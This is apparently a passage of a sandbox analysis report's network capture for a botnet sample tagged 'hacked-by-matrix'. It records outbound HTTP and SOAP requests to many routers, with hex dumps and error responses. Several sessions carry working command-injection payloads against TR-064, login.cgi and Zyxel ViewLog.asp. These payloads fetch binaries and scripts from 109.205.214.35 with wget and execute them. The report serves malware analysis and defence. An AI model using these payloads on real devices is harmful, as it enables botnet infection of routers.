                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 30 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 5f 59 65 68 43 71 31 50 6b 4b 45 64 63 33 30 73 62 53 50 62 53 4f 36 47 44 6e 58 69 6b 58 33 6e 56 71 4c 77 73 6a 64 4f 5a 6f 55 35 6c 39 55 4e 6c 50 41 33 34 67 3d 3d 0a 3c 2f 50 52 45 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><TITLE>ERROR: The request could not be satisfied</TITLE></HEAD><BODY><H1>400 ERROR</H1><H2>The request could not be satisfied.</H2><HR noshade size="1px">Bad request.We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.<BR clear="all">If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.<BR clear="all"><HR noshade size="1px"><PRE>Generated by cloudfront (CloudFront)Request ID: _YehCq1PkKEdc30sbSPbSO6GDnXikX3nVqLwsjdOZoU5l9UNlPA34g==</PRE><ADDRESS></ADDRESS></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        909192.168.2.134574299.231.98.2337547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.193572044 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        910192.168.2.1336268212.95.50.14480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.212476969 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:08.383862972 CET507INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:08 GMT
                                                        Server: Apache/2.4.41 (Ubuntu)
                                                        Content-Length: 313
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 63 34 30 31 37 2e 67 6e 75 68 6f 73 74 2e 65 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.nc4017.gnuhost.eu Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        911192.168.2.135018280.71.144.5880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.239763021 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:08.421886921 CET336INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.14.2
                                                        Date: Thu, 21 Mar 2024 04:23:08 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 169
                                                        Connection: keep-alive
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>
                                                        Mar 21, 2024 05:23:08.421989918 CET337INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.14.2
                                                        Date: Thu, 21 Mar 2024 04:23:08 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 173
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        912192.168.2.13486682.140.223.577547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.322449923 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:08.580602884 CET684INHTTP/1.1 500 Internal Server Error
                                                        Server: gSOAP/2.7
                                                        Content-Type: text/xml; charset=utf-8
                                                        Content-Length: 548
                                                        Connection: close
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 43 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 63 77 6d 70 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 63 77 6d 70 2d 31 2d 30 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 53 4f 41 50 2d 45 4e 56 3a 46 61 75 6c 74 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 66 61 75 6c 74 63 6f 64 65 3e 53 4f 41 50 2d 45 4e 56 3a 43 6c 69 65 6e 74 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 3e 4e 6f 20 58 4d 4c 20 65 6c 65 6d 65 6e 74 20 74 61 67 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 46 61 75 6c 74 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0"><SOAP-ENV:Body><SOAP-ENV:Fault SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><faultcode>SOAP-ENV:Client</faultcode><faultstring>No XML element tag</faultstring></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        913192.168.2.1341528220.88.23.357547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.358163118 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        914192.168.2.1359934175.238.89.1347547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.359232903 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        915192.168.2.1346822190.103.42.907547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.383696079 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        916192.168.2.1347006181.48.161.14580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.390521049 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:08.872441053 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:09.357582092 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:09.553132057 CET735INHTTP/1.1 404 Not Found
                                                        Server: Mini web server 1.0 ZTE corp 2005.
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data:
                                                        Cache-Control: no-cache,no-store
                                                        Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 54 4d 4c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <HTML> <HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"> <H2>404 Not Found</H2>The requested URL was not found on this server.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        917192.168.2.1354836200.46.129.9080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.408107042 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
